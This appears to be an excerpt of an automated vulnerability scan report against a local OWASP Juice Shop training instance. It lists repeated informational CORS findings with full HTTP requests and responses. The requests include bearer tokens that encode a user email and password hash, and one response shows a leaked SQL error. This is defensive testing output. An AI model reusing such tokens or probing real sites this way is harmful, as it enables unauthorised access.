Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:13:34 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.3. http://192.168.61.143:3000/api/BasketItems/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/BasketItems/

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://kpovdqsyjoyg.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

POST /api/BasketItems/ HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Content-Length: 43
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://kpovdqsyjoyg.com

{"ProductId":2,"BasketId":"4","quantity":1}

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 256
ETag: W/"100-5U5m4WxHtD6uZu8lKlODTg"
Date: Sun, 15 Jan 2017 21:10:05 GMT
Connection: close

{"status":"error","message":{"errno":19,"code":"SQLITE_CONSTRAINT","sql":"INSERT INTO `BasketItems` (`id`,`quantity`,`createdAt`,`updatedAt`,`ProductId`,`BasketId`) VALUES (NULL,1,'2017-01-15 21:10:04
...[SNIP]...
2.4. http://192.168.61.143:3000/api/BasketItems/7
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/BasketItems/7

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://cvzaxfhjshtt.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /api/BasketItems/7 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://cvzaxfhjshtt.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-gePwfRZF8T18+U2f4nstsg"
Date: Sun, 15 Jan 2017 21:11:03 GMT
Connection: close

{"status":"success","data":{}}
2.5. http://192.168.61.143:3000/api/BasketItems/8
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/BasketItems/8

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://bujvpofahlcd.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /api/BasketItems/8 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://bujvpofahlcd.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-gePwfRZF8T18+U2f4nstsg"
Date: Sun, 15 Jan 2017 21:11:02 GMT
Connection: close

{"status":"success","data":{}}
2.6. http://192.168.61.143:3000/api/Complaints/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/Complaints/

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://zqxglkuhoazq.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

POST /api/Complaints/ HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Content-Length: 36
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://zqxglkuhoazq.com

{"UserId":7,"message":"wewewewewew"}

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 151
ETag: W/"97-LRazqPJy/BZ74C+QETMaqQ"
Date: Sun, 15 Jan 2017 21:10:15 GMT
Connection: close

{"status":"success","data":{"UserId":7,"message":"wewewewewew","id":579,"updatedAt":"2017-01-15T21:10:15.000Z","createdAt":"2017-01-15T21:10:15.000Z"}}
2.7. http://192.168.61.143:3000/api/Feedbacks/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/Feedbacks/

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://iljjttmzqfex.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

POST /api/Feedbacks/ HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Content-Length: 42
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://iljjttmzqfex.com

{"UserId":7,"comment":"wewewe","rating":0}

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 157
ETag: W/"9d-+5j396qlxJyImUci6wc37w"
Date: Sun, 15 Jan 2017 21:10:21 GMT
Connection: close

{"status":"success","data":{"UserId":7,"comment":"wewewe","rating":0,"id":594,"updatedAt":"2017-01-15T21:10:21.000Z","createdAt":"2017-01-15T21:10:21.000Z"}}
2.8. http://192.168.61.143:3000/api/Products/1
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/Products/1

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://thjgmtviqahg.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /api/Products/1?d=Sun%20Jan%2015%202017 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://thjgmtviqahg.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 238
ETag: W/"ee-53rCFb8oFsZx9n/J7+mqUA"
Date: Sun, 15 Jan 2017 21:12:02 GMT
Connection: close

{"status":"success","data":{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classic.","price":1.99,"image":"apple_juice.jpg","createdAt":"2017-01-15T20:58:05.000Z","updatedAt":"2017-0
...[SNIP]...
2.9. http://192.168.61.143:3000/api/Products/18
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/Products/18

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://qzjiahqxybrt.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /api/Products/18?d=Sun%20Jan%2015%202017 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://qzjiahqxybrt.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 295
ETag: W/"127-PpZkvx2Uf2P7ykEwkJBylQ"
Date: Sun, 15 Jan 2017 21:12:02 GMT
Connection: close

{"status":"success","data":{"id":18,"name":"Fruit Press","description":"Fruits go in. Juice comes out. Pomace you can send back to us for recycling purposes.","price":89.99,"image":"fruit_press.jpg","
...[SNIP]...
2.10. http://192.168.61.143:3000/api/Products/2
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/Products/2

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://dkklryoaxfoj.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /api/Products/2?d=Sun%20Jan%2015%202017 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://dkklryoaxfoj.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 268
ETag: W/"10c-hkD1i8LMM3pl/uHqcFZ3hw"
Date: Sun, 15 Jan 2017 21:12:02 GMT
Connection: close

{"status":"success","data":{"id":2,"name":"Orange Juice (1000ml)","description":"Made from oranges hand-picked by Uncle Dittmeyer.","price":2.99,"image":"orange_juice.jpg","createdAt":"2017-01-15T20:5
...[SNIP]...
2.11. http://192.168.61.143:3000/api/Products/6
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/Products/6

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://paiwvnzrytjr.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /api/Products/6?d=Sun%20Jan%2015%202017 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://paiwvnzrytjr.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 244
ETag: W/"f4-TwNeU7jJ9LOASbCyrxRDhw"
Date: Sun, 15 Jan 2017 21:12:02 GMT
Connection: close

{"status":"success","data":{"id":6,"name":"Banana Juice (1000ml)","description":"Monkeys love it the most.","price":1.99,"image":"banana_juice.jpg","createdAt":"2017-01-15T20:58:05.000Z","updatedAt":"
...[SNIP]...
2.12. http://192.168.61.143:3000/api/Products/8
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/Products/8

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://lcjziiknfnqx.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /api/Products/8?d=Sun%20Jan%2015%202017 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
